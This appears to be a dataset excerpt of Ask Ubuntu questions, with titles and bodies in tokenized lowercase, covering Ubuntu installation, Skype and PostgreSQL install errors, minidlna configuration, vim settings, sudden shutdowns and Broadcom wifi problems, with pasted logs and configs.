331862	install ubuntu with daemon tools ?	i have windows 7 on a a45vd asus notbook it used to have ubuntu but at the time i bouht it it already had windows 7 ( because in my country ppl dont know what is ubuntu ) ok , heres the problem , i need to instal ubuntu but i dont have a cd , if i use daemon tools just to try it out and then if iwant a permanent istallation i wont be able to do it ? can i download the iso to a usb flash drive and then do the permanent installation and then how do i delete windows 7 from my harddrive . sorry for all the questions im a noob as u can see and english is not my native leanguage so excuse me if something doesnt makes sense
331867	press alt + arrow to skip full line ? ( or is there an existing shortcut already.. ? )	i am still a fresh ubuntu user , and i switched from a mac . what i can do on mac , is i can press alt + arrow to jump one word forward or backward , or if i press cmd + arrow , i am able to jump to the start or end of the line . and that 's what i would like to do in ubuntu . i would assign it to the alt key , as ctrl is already used to skip words . i use that function a lot when coding , i like to keep my hands on the keyboard and just not touch the mouse at all , and it just saves me time for not having to hold the arrow key until i get to the end of the line ( or the skip-a-word combo for that matter ) , or grabbing the mouse to click at the end , just to add a semicolon or something like that . it 's not a huge deal , but that 's just what i 'm used to . i still keep my mac partition for incompatibility issues , but i prefer ubuntu over mac . if there is already a shortcut to do that , i 'd gladly go ahead and try getting comfortable using it , but if it is not , how could i achieve what i described above , if of course it is even possible ?
331870	can not install skype on ubuntu 12.04 . how to solve this error ?	kithokit @ 09:39:03 ~ $ sudo apt-get install skype reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : skype-bin e : unable to correct problems , you have held broken packages . kithokit @ 09:39:13 ~ $ sudo apt-get install skype-bin reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype-bin : i386 : depends : libasound2 : i386 ( > = 1.0.23 ) but it is not going to be installed depends : libqt4-dbus : i386 ( > = 4:4.5.3 ) but it is not going to be installed depends : libqt4-network : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqtgui4 : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqtwebkit4 : i386 ( > = 2.2~2011week36 ) but it is not going to be installed depends : libx11-6 : i386 but it is not going to be installed depends : libxext6 : i386 but it is not going to be installed depends : libxss1 : i386 but it is not going to be installed depends : libxv1 : i386 but it is not going to be installed depends : libssl1.0.0 : i386 but it is not going to be installed depends : libgl1-mesa-glx : i386 but it is not going to be installed recommends : sni-qt : i386 but it is not going to be installed recommends : libasound2-plugins : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . kithokit @ 09:39:18 ~ $
331876	how to save vim bg color setting ?	i 'm learning vim for programming on my lubuntu laptop , but the dark blue color for comments makes my eyes melt . it looks better when using : set background=dark but it does not seem to remember this between sessions . i am a bit scared of changing the syncolor.vim file . is there another way to make vim remember this setting ?
331877	minidlna directory issues	i 've done my searching and ca n't find an answer to this specific issue . i have my minidlna set up and running - but it 's not really done properly . first off , when i open the server on my bluray player , all of my movies are listed twice - when they are certainly not saved on my external twice . second , when i open the server - rather than reading `` movies '' `` tv '' `` music '' , etc - it just mashes all of my movies , tv , and some other folders all together with no real organization . i never had this problem when i had my windows set up , so i know it 's something configured improperly more-so than my external drive giving me gruff . here 's my minidlna.conf file : # this is the configuration file for the minidlna daemon , a dlna/upnp-av media # server . # # unless otherwise noted , the commented out options show their default value . # # on debian , you can also refer to the minidlna.conf ( 5 ) man page for # documentation about this file . media_dir=/media/somnambulist/ghost in you # this option can be specified more than once if you want multiple directories # scanned . # # if you want to restrict a media_dir to a specific content type , you can # prepend the directory name with a letter representing the type ( a , p or v ) , # followed by a comma , as so : # * `` a '' for audio ( eg . media_dir=a , /var/lib/minidlna/music ) # * `` p '' for pictures ( eg . media_dir=p , /var/lib/minidlna/pictures ) # * `` v '' for video ( eg . media_dir=v , /var/lib/minidlna/videos ) # # warning : after changing this option , you need to rebuild the database . either # run minidlna with the '-r ' option , or delete the 'files.db ' file # from the db_dir directory ( see below ) . # on debian , you can run , as root , 'service minidlna force-reload ' instead . # media_dir=/var/lib/minidlna media_dir=v , /media/somnambulist/ghost in you/movies media_dir=v , /media/somnambulist/ghost in you/tv media_dir=p , /home/somnambulist/pictures # path to the directory that should hold the database and album art cache . db_dir=/home/somnambulist/serverart # path to the directory that should hold the log file . log_dir=/home/somnambulist/serverlog # minimum level of importance of messages to be logged . # must be one of `` off '' , `` fatal '' , `` error '' , `` warn '' , `` info '' or `` debug '' . # `` off '' turns of logging entirely , `` fatal '' is the highest level of importance # and `` debug '' the lowest . # log_level=warn # use a different container as the root of the directory tree presented to # clients . the possible values are : # * `` . '' - standard container # * `` b '' - `` browse directory '' # * `` m '' - `` music '' # * `` p '' - `` pictures '' # * `` v '' - `` video '' # if you specify `` b '' and client device is audio-only then `` music/folders '' will be used as root root_container=b # network interface ( s ) to bind to ( e.g . eth0 ) , comma delimited . # network_interface= # ipv4 address to listen on ( e.g . 192.0.2.1 ) . # listening_ip= # port number for http traffic ( descriptions , soap , media transfer ) . port=8200 # url presented to clients . # the default is the ip address of the server on port 80 . # presentation_url=http : //example.com:80 # name that the dlna server presents to clients . friendly_name=somnambulist media server # serial number the server reports to clients . serial=12345678 # model name the server reports to clients . # model_name=windows media connect compatible ( minidlna ) # model number the server reports to clients . model_number=1 # automatic discovery of new files in the media_dir directory . # inotify=yes # list of file names to look for when searching for album art . names should be # delimited with a forward slash ( `` / '' ) . album_art_names=cover.jpg/cover.jpg/albumartsmall.jpg/albumartsmall.jpg/albumart.jpg/albumart.jpg/album.jpg/album.jpg/folder.jpg/folder.jpg/thumb.jpg/thumb.jpg # strictly adhere to dlna standards . # this allows server-side downscaling of very large jpeg images , which may # decrease jpeg serving performance on ( at least ) sony dlna products . # strict_dlna=no # support for streaming .jpg and .mp3 files to a tivo supporting hmo . # enable_tivo=no # notify interval , in seconds . # notify_interval=895 # path to the minissdpd socket , for minissdpd support . # minissdpdsocket=/run/minissdpd.sock` and here 's the error i get in terminal when i run : sudo service minidlna restart sudo service minidlna force-reload force restart error : restarting dlna/upnp-av media server minidlna [ 2013/08/12 21:19:27 ] minidlna.c:474 : error : media directory `` /media/somnambulist/ghost in you/movies '' not accessible ! [ permission denied ] [ 2013/08/12 21:19:27 ] minidlna.c:474 : error : media directory `` /media/somnambulist/ghost in you/tv '' not accessible ! [ permission denied ] force-reload error : restarting dlna/upnp-av media server minidlna [ 2013/08/12 21:19:46 ] minidlna.c:474 : error : media directory `` /media/somnambulist/ghost in you/movies '' not accessible ! [ permission denied ] [ 2013/08/12 21:19:46 ] minidlna.c:474 : error : media directory `` /media/somnambulist/ghost in you/tv '' not accessible ! [ permission denied ] rm : can not remove ‘/home/somnambulist/serverart/files.db’ : permission denied rm : can not remove ‘/home/somnambulist/serverart/art_cache/media/somnambulist/ghost in you/movies/slumdog millionaire/slumdog.millionaire.cover.jpg’ : permission denied rm : can not remove ‘/home/somnambulist/serverart/art_cache/media/somnambulist/ghost in you/movies/zack and miri make a porno/zackandmirimakeapornocover.jpg’ : permission denied [ 2013/08/12 21:19:46 ] minidlna.c:744 : warn : failed to clean old file cache . [ ok ] i 've spent hours on this at this point , read through various files - and even had a friend who is relatively ubuntu-savvy try to help me via chat - no such luck . thanks in advance for any help .
331883	when will mono runtime 3.2 be available in ubuntu 12.04	does anyone know when mono runtime version 3.2 will be available with ubuntu ? the only stable released version i see is for mac os x . 3.2 has some things i need that 2.10 does n't offer . anyone know when it 's coming or how i can get it to install ?
331884	chromium does not sync bookmarks or extensions	i 've installed a fresh 12.4 but i ca n't seem to sync my bookmarks or extensions when i log-in chromium . then i tried installing chrome and same thing happened . i have searched it on google but ca n't find any useful info .
331885	no top panel after installing gnome	i recently removed unity and installed gnome from the software center . there is no top bar/panel .
331889	how to uninstall catalyst 13.8 beta ?	i 'm currently running 13.04 with the 3.10 kernel , so i can use my wifi . i foolishly tried to use catalyst 13.6 beta even though it says it 's not compatible with kernel 3.10 . still , i have my laptop right where i want and ca n't live without it , but i want to try to install catalyst 13.8 beta since it 's compatible with kernel 3.10 . if the install goes wrong , how can catalyst 13.8 beta be uninstalled ?
331891	sudden shutoff with no warnings on ubuntu 12.04	i have been experiencing sudden shuts with 12.04 lts . i am running a acer m5 581t ( g ) with 6 gigs ram laptop . i have been experiencing this for more then two weeks . its shuts off all a sudden with no warning . the temps are listed below at shut off . i have window 8 on the same machine and no problems running windows , no shut off . only once , and i had to update the bios firmware . any ideas would be great . thank you in advance . physical id 0 : +51.0°c core 0 : +52.0°c core 1 : +45.0°c here are my system logs . aug 12 18:43:32 david networkmanager [ 1728 ] : < info > ( wlan0 ) : cleaning up ... aug 12 18:43:32 david networkmanager [ 1728 ] : < info > ( wlan0 ) : taking down device . aug 12 18:43:32 david dbus [ 1634 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) aug 12 18:43:32 david dbus [ 1634 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' aug 12 18:43:33 david anacron [ 3805 ] : anacron 2.3 started on 2013-08-12 aug 12 18:43:33 david anacron [ 3805 ] : normal exit ( 0 jobs run ) aug 12 18:43:35 david kernel : [ 71.785778 ] pm : syncing filesystems ... done . aug 12 18:43:35 david kernel : [ 71.786947 ] pm : preparing system for mem sleep i put powered off the machine here . this is my boot up and in two minutes its shutdown no warning no nothing . aug 12 19:25:39 david kernel : [ 72.407396 ] freezing user space processes ... ( elapsed 0.01 seconds ) done . aug 12 19:25:39 david kernel : [ 72.423291 ] freezing remaining freezable tasks ... ( elapsed 0.01 seconds ) done . aug 12 19:25:39 david kernel : [ 72.439263 ] pm : entering mem sleep aug 12 19:25:39 david kernel : [ 72.439314 ] suspending console ( s ) ( use no_console_suspend to debug ) aug 12 19:25:39 david kernel : [ 72.439548 ] sd 1:0:0:0 : [ sdb ] synchronizing scsi cache aug 12 19:25:39 david kernel : [ 72.439554 ] sd 0:0:0:0 : [ sda ] synchronizing scsi cache aug 12 19:25:39 david kernel : [ 72.439842 ] sd 0:0:0:0 : [ sda ] stopping disk aug 12 19:25:39 david kernel : [ 72.441920 ] sd 1:0:0:0 : [ sdb ] stopping disk aug 12 19:25:39 david kernel : [ 72.724677 ] pm : suspend of drv : sd dev:0:0:0:0 complete after 285.608 msecs aug 12 19:25:39 david kernel : [ 72.724699 ] pm : suspend of drv : scsi dev : target0:0:0 complete after 285.597 msecs aug 12 19:25:39 david kernel : [ 72.724713 ] pm : suspend of drv : scsi dev : host0 complete after 285.591 msecs aug 12 19:25:39 david kernel : [ 72.738688 ] pm : suspend of drv : dev : ata1 complete after 299.311 msecs aug 12 19:25:39 david kernel : [ 72.754636 ] pm : suspend of drv : ahci dev:0000:00:1f.2 complete after 286.690 msecs aug 12 19:25:39 david kernel : [ 72.846476 ] pm : suspend of drv : snd_hda_intel dev:0000:00:1b.0 complete after 378.564 msecs aug 12 19:25:39 david kernel : [ 72.846513 ] pm : suspend of drv : dev : pci0000:00 complete after 378.045 msecs aug 12 19:25:39 david kernel : [ 72.846535 ] pm : suspend of devices complete after 407.812 msecs aug 12 19:25:39 david kernel : [ 72.846538 ] pm : suspend devices took 0.408 seconds aug 12 19:25:39 david kernel : [ 72.846677 ] pm : late suspend of devices complete after 0.137 msecs aug 12 19:25:39 david kernel : [ 72.862687 ] ehci_hcd 0000:00:1d.0 : wake-up capability enabled by acpi aug 12 19:25:39 david kernel : [ 72.878504 ] ehci_hcd 0000:00:1a.0 : wake-up capability enabled by acpi aug 12 19:25:39 david kernel : [ 72.910411 ] xhci_hcd 0000:00:14.0 : wake-up capability enabled by acpi aug 12 19:25:39 david kernel : [ 72.926403 ] pm : noirq suspend of devices complete after 79.856 msecs aug 12 19:25:39 david kernel : [ 72.926609 ] acpi : preparing to enter system sleep state s3 aug 12 19:25:39 david kernel : [ 73.026582 ] pm : saving platform nvs memory aug 12 19:25:39 david kernel : [ 73.028460 ] disabling non-boot cpus ... aug 12 19:25:39 david kernel : [ 73.130015 ] cpu 1 is now offline aug 12 19:25:39 david kernel : [ 73.233821 ] cpu 2 is now offline aug 12 19:25:39 david kernel : [ 73.234448 ] broke affinity for irq 1 aug 12 19:25:39 david kernel : [ 73.337631 ] cpu 3 is now offline aug 12 19:25:39 david kernel : [ 73.339274 ] acpi : low-level resume complete aug 12 19:25:39 david kernel : [ 73.339324 ] pm : restoring platform nvs memory aug 12 19:25:39 david kernel : [ 73.339878 ] enabling non-boot cpus ... aug 12 19:25:39 david kernel : [ 73.339981 ] booting node 0 processor 1 apic 0x1 aug 12 19:25:39 david kernel : [ 73.370979 ] cpu1 is up aug 12 19:25:39 david kernel : [ 73.371087 ] booting node 0 processor 2 apic 0x2 aug 12 19:25:39 david kernel : [ 73.385241 ] cpu2 is up aug 12 19:25:39 david kernel : [ 73.385336 ] booting node 0 processor 3 apic 0x3 aug 12 19:25:39 david kernel : [ 73.399467 ] cpu3 is up aug 12 19:25:39 david kernel : [ 73.404371 ] acpi : waking up from system sleep state s3 i cut out a lot of the boot process ... ... aug 12 19:27:07 david kernel : [ 31.122247 ] cpu2 : package power limit notification ( total events = 1 ) aug 12 19:27:07 david kernel : [ 31.122251 ] cpu1 : package power limit notification ( total events = 1 ) aug 12 19:27:07 david kernel : [ 31.122252 ] cpu3 : package power limit notification ( total events = 1 ) aug 12 19:27:07 david kernel : [ 31.122254 ] cpu0 : package power limit notification ( total events = 1 ) aug 12 19:27:07 david networkmanager [ 1656 ] : < info > ( wlan0 ) : supplicant interface state : associated - > 4-way handshake aug 12 19:27:07 david wpa_supplicant [ 1744 ] : wpa : tx bit set for gtk , but pairwise keys are used - ignore tx bit aug 12 19:27:07 david wpa_supplicant [ 1744 ] : wpa : key negotiation completed with 00:15 : ff:54 : bc:76 [ ptk=ccmp gtk=ccmp ] aug 12 19:27:07 david wpa_supplicant [ 1744 ] : ctrl-event-connected - connection to 00:15 : ff:54 : bc:76 completed ( auth ) [ id=0 id_str= ] aug 12 19:27:07 david networkmanager [ 1656 ] : < info > ( wlan0 ) : supplicant interface state : 4-way handshake - > completed aug 12 19:27:07 david networkmanager [ 1656 ] : < info > activation ( wlan0/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'mifi4620le jetpack bc76 secure ' . aug 12 19:27:07 david networkmanager [ 1656 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) scheduled . aug 12 19:27:07 david networkmanager [ 1656 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) started ... aug 12 19:27:07 david networkmanager [ 1656 ] : < info > ( wlan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] aug 12 19:27:07 david networkmanager [ 1656 ] : < info > activation ( wlan0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) aug 12 19:27:07 david kernel : [ 31.133251 ] cpu2 : package power limit normal aug 12 19:27:07 david kernel : [ 31.133253 ] cpu3 : package power limit normal aug 12 19:27:07 david kernel : [ 31.133255 ] cpu1 : package power limit normal aug 12 19:27:07 david kernel : [ 31.133256 ] cpu0 : package power limit normal aug 12 19:27:07 david dhclient : internet systems consortium dhcp client 4.1-esv-r4 aug 12 19:27:07 david dhclient : copyright 2004-2011 internet systems consortium . aug 12 19:27:07 david dhclient : all rights reserved . aug 12 19:27:07 david dhclient : for info , please visit https : //www.isc.org/software/dhcp/ aug 12 19:27:07 david dhclient : aug 12 19:27:07 david networkmanager [ 1656 ] : < info > dhclient started with pid 3359 aug 12 19:27:07 david networkmanager [ 1656 ] : < info > activation ( wlan0 ) beginning ip6 addrconf . aug 12 19:27:07 david networkmanager [ 1656 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) complete . aug 12 19:27:07 david networkmanager [ 1656 ] : < info > ( wlan0 ) : dhcpv4 state changed nbi - > preinit aug 12 19:27:07 david dhclient : listening on lpf/wlan0/20:16 : d8:44:13:8f aug 12 19:27:07 david dhclient : sending on lpf/wlan0/20:16 : d8:44:13:8f aug 12 19:27:07 david dhclient : sending on socket/fallback aug 12 19:27:07 david dhclient : dhcprequest of 192.168.1.3 on wlan0 to 255.255.255.255 port 67 aug 12 19:27:07 david dhclient : dhcpnak from 192.168.1.1 aug 12 19:27:07 david networkmanager [ 1656 ] : < info > ( wlan0 ) : dhcpv4 state changed preinit - > expire aug 12 19:27:07 david dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 3 aug 12 19:27:07 david networkmanager [ 1656 ] : < info > ( wlan0 ) : dhcpv4 state changed expire - > preinit aug 12 19:27:08 david dhclient : dhcprequest of 192.168.1.3 on wlan0 to 255.255.255.255 port 67 aug 12 19:27:08 david dhclient : dhcpoffer of 192.168.1.3 from 192.168.1.1 aug 12 19:27:08 david dhclient : dhcpack of 192.168.1.3 from 192.168.1.1 aug 12 19:27:08 david dhclient : bound to 192.168.1.3 -- renewal in 39179 seconds . aug 12 19:27:08 david networkmanager [ 1656 ] : < info > ( wlan0 ) : dhcpv4 state changed preinit - > bound aug 12 19:27:08 david networkmanager [ 1656 ] : < info > address 192.168.1.3 aug 12 19:27:08 david networkmanager [ 1656 ] : < info > prefix 24 ( 255.255.255.0 ) aug 12 19:27:08 david networkmanager [ 1656 ] : < info > gateway 192.168.1.1 aug 12 19:27:08 david networkmanager [ 1656 ] : < info > nameserver '192.168.1.1' aug 12 19:27:08 david networkmanager [ 1656 ] : < info > domain name 'mifi.local' aug 12 19:27:08 david networkmanager [ 1656 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... aug 12 19:27:08 david networkmanager [ 1656 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ipv4 commit ) started ... aug 12 19:27:09 david networkmanager [ 1656 ] : < info > dns : starting dnsmasq ... aug 12 19:27:09 david networkmanager [ 1656 ] : < info > ( wlan0 ) : writing resolv.conf to /sbin/resolvconf aug 12 19:27:09 david dnsmasq [ 3407 ] : started , version 2.59 cache disabled aug 12 19:27:09 david dnsmasq [ 3407 ] : compile time options : ipv6 gnu-getopt dbus i18n dhcp tftp conntrack idn aug 12 19:27:09 david dnsmasq [ 3407 ] : using nameserver 192.168.1.1 # 53 aug 12 19:27:10 david networkmanager [ 1656 ] : < info > ( wlan0 ) : device state change : ip-config - > activated ( reason 'none ' ) [ 70 100 0 ] suddenly shut down here aug 12 19:36:29 david kernel : imklog 5.8.6 , log source = /proc/kmsg started . aug 12 19:36:29 david rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 1676 '' x-info= '' http : //www.rsyslog.com '' ] start aug 12 19:36:29 david rsyslogd : rsyslogd 's groupid changed to 103 aug 12 19:36:29 david rsyslogd : rsyslogd 's userid changed to 101 aug 12 19:36:29 david rsyslogd-2039 : could not open output pipe '/dev/xconsole ' [ try http : //www.rsyslog.com/e/2039 ] any ideas would be great . thanks . update : my current /proc/interrupts shows my thermal event interrupts as follows : ` trm : 843 844 841 842 thermal event interrupts ` my sensors are showing the following from the command line : ` david @ david : ~ $ sensors coretemp-isa-0000 adapter : isa adapter physical id 0 : +46.0°c core 0 : +46.0°c core 1 : +46.0°c ` my understanding that is that a trm , thermal event interrupt is as follows : '' thermal event interrupts occur when a temperature threshold has been exceeded for some cpu chip . iirc , a thermal interrupt is also generated when the temperature drops back to a normal level. `` why am i seeing normal temperatures from sensors , but getting interrupts in /proc/interrupts ? any ideas .
331893	unable to install ubuntu 12.04 on my windows 7 hp laptop dvd ejects automatically	hi i am very new to ubuntu and but i want it . i downloaded ubuntu iso file from the site and burnt the image to a dvd . i boot my windows 7 laptop using the dvd , the screen shows all the options and then when i select `` install ubuntu along with windows 7 '' , it takes a while and then the dvd gets ejected `` eject the media and press enter `` and the system reboots into windows 7 . can any one help me to sort this out . note : i use a usb dongle for internet and dont have any wifi around . so there is no internet connectivity during installation . pls find below my laptop configuration . genuine windows 7 home premium 32-bit 15.6” inch ( 1366×768 pixels ) hp led brightview display amd athlon ii m300 dual-core processor ( 2.0 ghz , 1 mb l2 cache ) ati radeon 3200 integrated graphics 4gb ddr2 ram 320 gb hard disk 8x dvd±rw with double layer support 5-in-1 integrated memory card reader high speed 56k modem wlan 802.11b/g bluetooth integrated fingerprint reader webcam with integrated mic altec lansing speakers 65 w ac power adapter 6 cell battery weight : 2.94 kg
331896	error starting up postgresql in 12.10	the following new packages will be installed : libpq5 postgresql-9.1 postgresql-client-9.1 postgresql-client-common postgresql-common 0 upgraded , 5 newly installed , 0 to remove and 2 not upgraded . need to get 0 b/3,389 kb of archives . after this operation , 15.8 mb of additional disk space will be used . do you want to continue [ y/n ] ? y preconfiguring packages ... selecting previously unselected package libpq5 . ( reading database ... 58862 files and directories currently installed . ) unpacking libpq5 ( from ... /libpq5_9.1.9-0ubuntu12.10_amd64.deb ) ... selecting previously unselected package postgresql-client-common . unpacking postgresql-client-common ( from ... /postgresql-client-common_136_all.deb ) ... selecting previously unselected package postgresql-client-9.1 . unpacking postgresql-client-9.1 ( from ... /postgresql-client-9.1_9.1.9-0ubuntu12.10_amd64.deb ) ... selecting previously unselected package postgresql-common . unpacking postgresql-common ( from ... /postgresql-common_136_all.deb ) ... adding 'diversion of /usr/bin/pg_config to /usr/bin/pg_config.libpq-dev by postgresql-common' selecting previously unselected package postgresql-9.1 . unpacking postgresql-9.1 ( from ... /postgresql-9.1_9.1.9-0ubuntu12.10_amd64.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... setting up libpq5 ( 9.1.9-0ubuntu12.10 ) ... setting up postgresql-client-common ( 136 ) ... setting up postgresql-client-9.1 ( 9.1.9-0ubuntu12.10 ) ... setting up postgresql-common ( 136 ) ... building postgresql dictionaries from installed myspell/hunspell packages ... * no postgresql clusters exist ; see `` man pg_createcluster '' processing triggers for ureadahead ... setting up postgresql-9.1 ( 9.1.9-0ubuntu12.10 ) ... creating new cluster ( configuration : /etc/postgresql/9.1/main , data : /var/lib/postgresql/9.1/main ) ... moving configuration file /var/lib/postgresql/9.1/main/postgresql.conf to /etc/postgresql/9.1/main ... moving configuration file /var/lib/postgresql/9.1/main/pg_hba.conf to /etc/postgresql/9.1/main ... moving configuration file /var/lib/postgresql/9.1/main/pg_ident.conf to /etc/postgresql/9.1/main ... configuring postgresql.conf to use port 5432 ... update-alternatives : using /usr/share/postgresql/9.1/man/man1/postmaster.1.gz to provide /usr/share/man/man1/postmaster.1.gz ( postmaster.1.gz ) in auto mode * starting postgresql 9.1 database server * use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . use of uninitialized value $ logsize in numeric gt ( > ) at /usr/bin/pg_ctlcluster line 215 . the postgresql server failed to start . please check the log output . [ fail ] invoke-rc.d : initscript postgresql , action `` start '' failed . dpkg : error processing postgresql-9.1 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : postgresql-9.1 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) here 's the output of uname -a : linux $ hostname 3.5.0-36-generic # 57-ubuntu smp wed jun 19 15:10:49 utc 2013 x86_64 x86_64 x86_64 gnu/linux it 's an amazon aws ec2 server - m1.small . from a look through /usr/bin/pg_ctlcluster ( a perl script ) , it 's trying to read /etc/postgresql/9.1/main/pg_ctl.conf to find the log directory and it 's somehow getting an invalid value . i do n't understand why that would be a problem with a fresh installation . any pointers would be greatly appreciated . thanks ,
331898	wireless not working - not attached to wlan0	new to linux . i have a broadcom bcm4311 wi-fi card . the wi-fi was working after installing the b43 drivers , but has stopped working . for some reason it 's now not attached to wlan0 . please help me . i do n't have an ethernet cable , but a windows machine connected to the net via wireless . ubuntu version 12.10. lspci -vvnn | grep 14e4 : ethernet controller : broadcom netxtreme bcm5788 gigabit ethernet [ 14e4:169c ] network controller : broadcom corporation bcm4311 802.11a/b/g [ 14e4:4312 ] lshw -c network -short : h/w path device class description /0/100/6/0 network bcm4311 802.11a/b/g /0/100/14.4/1 etho network netxtreme bcm5788 gigabit ethernet /1 wlan0 network wireless interface not sure if the following would help : lsmod | grep b43 b43 347364 0 mac80211 461261 1 b43 cfg80211 175574 2 b43 , mac80211 bcma 34484 1 b43 ssb 50088 2 b43 , ssb_hcd
